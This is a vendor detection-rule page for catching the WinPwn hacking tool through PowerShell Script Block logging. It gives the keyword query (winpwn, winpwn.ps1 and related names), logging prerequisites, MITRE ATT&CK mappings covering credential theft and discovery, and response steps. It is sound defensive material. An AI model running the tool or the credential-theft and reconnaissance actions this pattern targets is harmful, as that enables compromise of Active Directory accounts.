HackTool - WinPwn Execution - ScriptBlock

About the rule

Rule Type

Standard

Rule Description

WinPwn is a hacking tool that uses PowerShell commands to scan Active Directory environments and enumerate user credentials. This rule detects such suspicious command-line activity that indicates the execution of WinPwn for AD reconnaissance and discovery.

Severity

Trouble

Rule journey

Attack chain scenario

Initial Access → PowerShell execution → Discovery → Credential Access

Impact

• System compromise
• Credential compromise
• Data theft

Rule Requirement

Prerequisites

Logon to Group Policy Management Console with administrative privileges and enable Module Logging for Windows PowerShell in the Group Policy Management Editor. Ensure to enter * in the Module Names window to record all modules. Similarly enable PowerShell Script Block Logging for Windows PowerShell. Finally, create a new registry key "Microsoft-Windows-Powershell/Operational" in the directory "Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\".

(((( SCRIPTEXECUTED CONTAINS ""offline_winpwn"" ) OR ( SCRIPTEXECUTED CONTAINS ""winpwn"" ) OR ( SCRIPTEXECUTED CONTAINS ""winpwn.exe"" ) OR ( SCRIPTEXECUTED CONTAINS ""winpwn.ps1"" ) )))

This rule is triggered when the executed script contains the following suspicious elements:

• offline_winpwn: Refers to an offline version of WinPwn, a tool used for Windows privilege escalation.
• winpwn: Refers to WinPwn tool which can be used for post exploitation attacks.
• winpwn.exe: Refers to a WinPwn executable file.
• winpwn.ps1: Refers to a PowerShell script associated with WinPwn tool.

Criteria

Detection

Execution Mode

realtime

Log Sources

Active Directory

MITRE ATT&CK

Defense Evasion: Abuse Elevation Control Mechanism - Bypass User Account Control (T1548.002); Privilege Escalation: Abuse Elevation Control Mechanism - Bypass User Account Control (T1548.002); Execution: Native API (T1106); Credential Access: Unsecured Credentials - Credentials In Files (T1552.001); Discovery: System Information Discovery (T1082); Discovery: Software Discovery (T1518); Discovery: Network Service Discovery (T1046); Credential Access: Credentials from Password Stores - Credentials from Web Browsers (T1555.003); Credential Access: Credentials from Password Stores (T1555)

Security Standards

Enabling this rule will help you meet the security standard's requirement listed below:

DE.CM-09: Computing hardware and software, runtime environments, and their data are monitored to find potentially adverse events.

When this rule is triggered, you're notified of a PowerShell script execution involving the WinPwn hack tool. This enables you to monitor runtime environments like PowerShell to identify malicious executions that provide unauthorized access to AD credentials and configurations.

Author

Swachchhanda Shrawan Poudel

Future actions

Known False Positives

This rule might be triggered when red teams carry out penetration tests to identify AD vulnerabilities and misconfigurations.

Next Steps

When this rule is triggered, the following measures can be implemented:

1. Identification: Identify if the flagged event is a new incident or part of an existing incident.
2. Analysis: Analyze the impact and extent of the incident to comprehend the severity of the attack using the Incident Workbench.
3. Response: Respond promptly by initiating an automated workflow to interrupt the network connections and cease the malicious process.
4. Audit PowerShell executions: Continuously monitor PowerShell activities, block command executions that involve hack tools like WinPwn, and restrict script execution privileges to administrators only.

Mitigation